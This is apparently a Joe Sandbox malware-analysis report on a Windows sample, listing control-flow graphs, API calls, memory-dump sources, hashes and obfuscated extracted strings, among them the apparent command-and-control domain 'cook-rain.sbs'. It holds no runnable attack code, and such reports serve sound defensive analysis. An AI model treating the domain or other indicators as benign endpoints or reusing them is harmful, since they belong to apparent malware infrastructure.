                                          control_flow_graph 118 95cf05-95cf12 119 95cf20-95cf5c 118->119 119->119 120 95cf5e-95cfa5 call 958930 call 989030 119->120 125 95cfb0-95cffc 120->125 125->125 126 95cffe-95d06b 125->126 127 95d070-95d097 126->127 127->127 128 95d099-95d0aa 127->128 129 95d0ac-95d0b3 128->129 130 95d0cb-95d0d3 128->130 133 95d0c0-95d0c9 129->133 131 95d0d5-95d0d6 130->131 132 95d0eb-95d0f8 130->132 134 95d0e0-95d0e9 131->134 135 95d11b-95d123 132->135 136 95d0fa-95d101 132->136 133->130 133->133 134->132 134->134 138 95d125-95d126 135->138 139 95d13b-95d266 135->139 137 95d110-95d119 136->137 137->135 137->137 140 95d130-95d139 138->140 141 95d270-95d2ce 139->141 140->139 140->140 141->141 142 95d2d0-95d2ff 141->142 143 95d300-95d31a 142->143 143->143 144 95d31c-95d36b call 95b960 143->144 147 95d370-95d3ac 144->147 147->147 148 95d3ae-95d3c5 call 958930 call 989030 147->148 152 95d3ca-95d3eb 148->152 153 95d3f0-95d43c 152->153 153->153 154 95d43e-95d4ab 153->154 155 95d4b0-95d4d7 154->155 155->155 156 95d4d9-95d4ea 155->156 157 95d4ec-95d4ef 156->157 158 95d4fb-95d503 156->158 159 95d4f0-95d4f9 157->159 160 95d505-95d506 158->160 161 95d51b-95d528 158->161 159->158 159->159 164 95d510-95d519 160->164 162 95d54b-95d557 161->162 163 95d52a-95d531 161->163 166 95d559-95d55a 162->166 167 95d56b-95d696 162->167 165 95d540-95d549 163->165 164->161 164->164 165->162 165->165 168 95d560-95d569 166->168 169 95d6a0-95d6fe 167->169 168->167 168->168 169->169 170 95d700-95d72f 169->170 171 95d730-95d74a 170->171 171->171 172 95d74c-95d791 call 95b960 171->172
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ()$+S7U$,_"Q$0C%E$7W"i$;[*]$<KuM$BB9321930CE9E017D7CBBD6DF28D3732$N3F5$S7HI$cook-rain.sbs$y?O1$c]e$gy
                                          • API String ID: 0-1599543296
                                          • Opcode ID: 718a20c28cfcb5a3d20f2348899575fa332d72d313ea24fd5cbe85065cabbc17
                                          • Instruction ID: c5054a9911fb2e97f886042b8fea6ca52843a01d33bbe3cdc54d1fa7286310e4
                                          • Opcode Fuzzy Hash: 718a20c28cfcb5a3d20f2348899575fa332d72d313ea24fd5cbe85065cabbc17
                                          • Instruction Fuzzy Hash: 02120CB154D3C18ED335CF2AC495BEFBBA1ABD2304F18895CC8DA5B256C774094ACB92

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 203 9589a0-9589b1 call 98cb70 206 9589b7-9589cf call 986620 203->206 207 958cb3-958cbb ExitProcess 203->207 211 9589d5-9589fb 206->211 212 958cae call 98deb0 206->212 216 958a01-958bda 211->216 217 9589fd-9589ff 211->217 212->207 219 958be0-958c50 216->219 220 958c8a-958ca2 call 959ed0 216->220 217->216 222 958c56-958c88 219->222 223 958c52-958c54 219->223 220->212 225 958ca4 call 95ce80 220->225 222->220 223->222 227 958ca9 call 95b930 225->227 227->212
                                          APIs
                                          • ExitProcess.KERNEL32(00000000), ref: 00958CB6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: 38a6888df78534d59b20b62120d7dbe5dac6a74758a5ffec945458337a74d00d
                                          • Instruction ID: f1a887cbecdf653e51e5089ef146e8e5bd508895d1f1ae36e695739223c04e83
                                          • Opcode Fuzzy Hash: 38a6888df78534d59b20b62120d7dbe5dac6a74758a5ffec945458337a74d00d
                                          • Instruction Fuzzy Hash: F571F473B547044BC708DEAAD89235BF6D6ABC8714F09D83D6888D7391EEB89C054785

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 234 98df70-98dfa2 LdrInitializeThunk
                                          APIs
                                          • LdrInitializeThunk.NTDLL(0098BA46,?,00000010,00000005,00000000,?,00000000,?,?,00969158,?,?,009619B4), ref: 0098DF9E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                          • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                          • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                          • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 229 98b7e0-98b7ff 230 98b800-98b83d 229->230 230->230 231 98b83f-98b85b RtlAllocateHeap 230->231
                                          APIs
                                          • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0098B84E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 78c5974dfdac06fd98d05769deca1ffe2324ccd30f39db8dda8e8bdb8c770492
                                          • Instruction ID: 8b26079160f7d8c7e70530c306d9377b2475fb941596ce430de1b290688f832b
                                          • Opcode Fuzzy Hash: 78c5974dfdac06fd98d05769deca1ffe2324ccd30f39db8dda8e8bdb8c770492
                                          • Instruction Fuzzy Hash: EB017633A557180BC300AE7CDC9464ABB96EFD9224F2A063CE5D4873D0DA31990A8395

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 232 95ce80-95ceb0 CoInitializeEx
                                          APIs
                                          • CoInitializeEx.COMBASE(00000000,00000002), ref: 0095CE94
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID: Initialize
                                          • String ID:
                                          • API String ID: 2538663250-0
                                          • Opcode ID: e1fd14ba3f855024b93cd312674fb3384530ce5b407439b276912d964c9fcaf5
                                          • Instruction ID: 07e0a9082e63cdf116e5b461bb395fefaa17de192b635d7c2194d2f8deb99640
                                          • Opcode Fuzzy Hash: e1fd14ba3f855024b93cd312674fb3384530ce5b407439b276912d964c9fcaf5
                                          • Instruction Fuzzy Hash: 88D0A7213A424877D114A61EEC97F27325DC702754F440627A7A2CA2C2D951A915D065

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 233 95ceb3-95cee2 CoInitializeSecurity
                                          APIs
                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0095CEC6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID: InitializeSecurity
                                          • String ID:
                                          • API String ID: 640775948-0
                                          • Opcode ID: 8930e31ca16d65562646b6b675296f6453ccd25cd524d0aa6b4a6e0cf2cf043e
                                          • Instruction ID: 480a1cb79fc3bd20058c2e455a60405c9c1519a4813c33a0373a245283b60032
                                          • Opcode Fuzzy Hash: 8930e31ca16d65562646b6b675296f6453ccd25cd524d0aa6b4a6e0cf2cf043e
                                          • Instruction Fuzzy Hash: 8BD012313EC34176F974860C9C53F1022058705F64F340B09B332FE2E1C9D17141950C

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 276 95d7d3-95d7d8 CoUninitialize 277 95d7da-95d7e1 276->277
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID: Uninitialize
                                          • String ID:
                                          • API String ID: 3861434553-0
                                          • Opcode ID: f656ff43ad9f62686d0056aeec7b0883f6496a8d89a004a209a4ad7ce7233cf8
                                          • Instruction ID: f8c8045966430e37086e292212e110a97522949cbefeadd2c6987a867e9ef7ed
                                          • Opcode Fuzzy Hash: f656ff43ad9f62686d0056aeec7b0883f6496a8d89a004a209a4ad7ce7233cf8
                                          • Instruction Fuzzy Hash: 4BA0113BB00008888B8000A8B8020EEF320E28003AB0002B3C328C2800EA22A2288280
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID: $!@$,$9$:$;$`$`$`$e$e$e$f$f$f$g$g$g$n
                                          • API String ID: 1279760036-1524723224
                                          • Opcode ID: dd3e452c7c0462840ef3572d84fe2ae9cf5da84567aba0a32afb08132e022b9c
                                          • Instruction ID: ffb350a4030466505b4afe674c0e5d2b4a9e01001597b11c90177291a4c9ac89
                                          • Opcode Fuzzy Hash: dd3e452c7c0462840ef3572d84fe2ae9cf5da84567aba0a32afb08132e022b9c
                                          • Instruction Fuzzy Hash: 67228CB260C3808FD3219F28C4943AFBBE1AB95314F188D6DE5D987392D77A8845DB53
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: n[$8$=86o$BDZF$N$RHL9$SD]z$ZS$_CYG$f)2s$mmi.$p8Bb$txfF$u{{h
                                          • API String ID: 0-1787199350
                                          • Opcode ID: 4f528f0c90cc623b71a293a4037b626f3364ba5f16f27244a2274f38ff2d6f74
                                          • Instruction ID: 3821235d6111a435fb98f2f1d9cff63994e6d8c976be76ce741446db9d67398b
                                          • Opcode Fuzzy Hash: 4f528f0c90cc623b71a293a4037b626f3364ba5f16f27244a2274f38ff2d6f74
                                          • Instruction Fuzzy Hash: 24B1E87010C3818FD315CF2A80607ABBFE5AF97345F18496DE8D58B392D779890ACB52
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BB9321930CE9E017D7CBBD6DF28D3732$DG$Ohs,$chs,$fhnf$fhnf$xy$su${}
                                          • API String ID: 0-2990117919
                                          • Opcode ID: 88726869b184a321e45550151c67a99f07daf8cccf6dd3472475b1ea15f4e0ff
                                          • Instruction ID: 79d301fd1407cc2c148e8868f140c167d054a07573848faa290c601e22158ca1
                                          • Opcode Fuzzy Hash: 88726869b184a321e45550151c67a99f07daf8cccf6dd3472475b1ea15f4e0ff
                                          • Instruction Fuzzy Hash: 05E15D72A483508BD324CF36C85136BBBE6EBD1314F198A2DE9E58B395D734C809CB42
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .`{$=0}w$dC?g$e&~$#[$#[$bw>
                                          • API String ID: 0-6439773
                                          • Opcode ID: cd2eaf400f6b9e4e80e446027cb6ce177d5ab8444c9eb6c6b0513d412e99934a
                                          • Instruction ID: 31181eb35cd1d582626ba5c12c80c5128797f4669e9edf9132ac6199826b8260
                                          • Opcode Fuzzy Hash: cd2eaf400f6b9e4e80e446027cb6ce177d5ab8444c9eb6c6b0513d412e99934a
                                          • Instruction Fuzzy Hash: 41B2F3F3A0C2009FE304AE29DC8567AFBE5EF94720F16893DE6C4C7744EA3598458796
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: U$2zm"$L'w$L'w$SnT$i|$xAO
                                          • API String ID: 0-2499630841
                                          • Opcode ID: f6afefd746103d69dcfd7d55f6465d9c1e29148f5352e4fecba13a550ae3707b
                                          • Instruction ID: 719f6585735a7f5852b2a65cd6e8a68cc228bb952b1c5fd40d94da9615e5ec1c
                                          • Opcode Fuzzy Hash: f6afefd746103d69dcfd7d55f6465d9c1e29148f5352e4fecba13a550ae3707b
                                          • Instruction Fuzzy Hash: E64207B360C314AFE3046E2DEC8567AF7E5EF94720F1A4A3DE6C483744EA3558418697
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 5[Y$8$CN$Lw$}~$SRQ$_]
                                          • API String ID: 0-3274379026
                                          • Opcode ID: 8b48ac208c5107d484f978683f7eabed457e4a906544c2b868d1399e3fd378ac
                                          • Instruction ID: e18594b3c9ada7e3b132917f6342c0277797463e3c410f245be945ab1dd2cacd
                                          • Opcode Fuzzy Hash: 8b48ac208c5107d484f978683f7eabed457e4a906544c2b868d1399e3fd378ac
                                          • Instruction Fuzzy Hash: 65515971A193518BD320CF25C8902ABB7F6FFD2341F18895CE8D18B295EB788906C792
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $jy$O9bM$\co$_zJn$S~W
                                          • API String ID: 0-3200088448
                                          • Opcode ID: d169d53575233063eb6868d4d3f2d5e4c70d98fbe5d0fe053789b2ff54782f5a
                                          • Instruction ID: d881bfc1720706f0213732b49438885f72f511d539ba4a163b6b9900feb89065
                                          • Opcode Fuzzy Hash: d169d53575233063eb6868d4d3f2d5e4c70d98fbe5d0fe053789b2ff54782f5a
                                          • Instruction Fuzzy Hash: A9B2F7F36082049FE304AE2DEC8577ABBE9EFD4720F1A893DE6C4C7744E63558058696
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 6'N$v^#^$;~$tu
                                          • API String ID: 0-2988868443
                                          • Opcode ID: 2e9d351e18cde9d5527a9a27837e85131efbf9511378b21fffb51567cad47e2e
                                          • Instruction ID: 094f85d15c392bb3ba9a03599f0f4aec1ef3e89365a516c9a216c45819a03fbe
                                          • Opcode Fuzzy Hash: 2e9d351e18cde9d5527a9a27837e85131efbf9511378b21fffb51567cad47e2e
                                          • Instruction Fuzzy Hash: EEB2F8F360C204AFE304AE2DEC8567BB7E9EF94720F1A853DE6C583744E63558058696
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Lk$U\$Zb$cook-rain.sbs$r
                                          • API String ID: 0-1143509894
                                          • Opcode ID: 50bbe559b3c1c8e1ba26577e69a880eb6760ebb236f9eb2ec2b1fd4bd5d1fbad
                                          • Instruction ID: b0b72744329529d0bb5c6b7117f264a5ca635cf9515b685b538946f8819d76c0
                                          • Opcode Fuzzy Hash: 50bbe559b3c1c8e1ba26577e69a880eb6760ebb236f9eb2ec2b1fd4bd5d1fbad
                                          • Instruction Fuzzy Hash: 3CA1BE7010C3D18AD779CF26D4947EFBBE1AB93308F18895DD4E94B292E739460A8B47
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: )=+4$57$7514$84*6$N
                                          • API String ID: 0-4020838272
                                          • Opcode ID: be85e90a30f89c364b58cec467ad0dcda84538ec37489d1a8be0575a1ed0ed84
                                          • Instruction ID: 8bf1750eaf05d6e2b07684a23e607976ed1170e982539d622e664e0322536b27
                                          • Opcode Fuzzy Hash: be85e90a30f89c364b58cec467ad0dcda84538ec37489d1a8be0575a1ed0ed84
                                          • Instruction Fuzzy Hash: EB71A16110C3D28BE315CF2A84A037BFFE59FA2305F18499DE4D64B292D779890AC752
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: +2/?$=79$BBSH$GZE^
                                          • API String ID: 0-3392023846
                                          • Opcode ID: be42e8a764808261ecc8ad8a87e2e0861b5e0d724bef01d0a4a837402fa0af2e
                                          • Instruction ID: eedc81f971a00c2e53aadd4cdced74de006454a2cd6b9e9529a1ef2a54075bb8
                                          • Opcode Fuzzy Hash: be42e8a764808261ecc8ad8a87e2e0861b5e0d724bef01d0a4a837402fa0af2e
                                          • Instruction Fuzzy Hash: 5552F172504B418FC735CF39C890766BBE1BF96314F188A6DD4EA8BB92D735A806CB50
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
• Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp
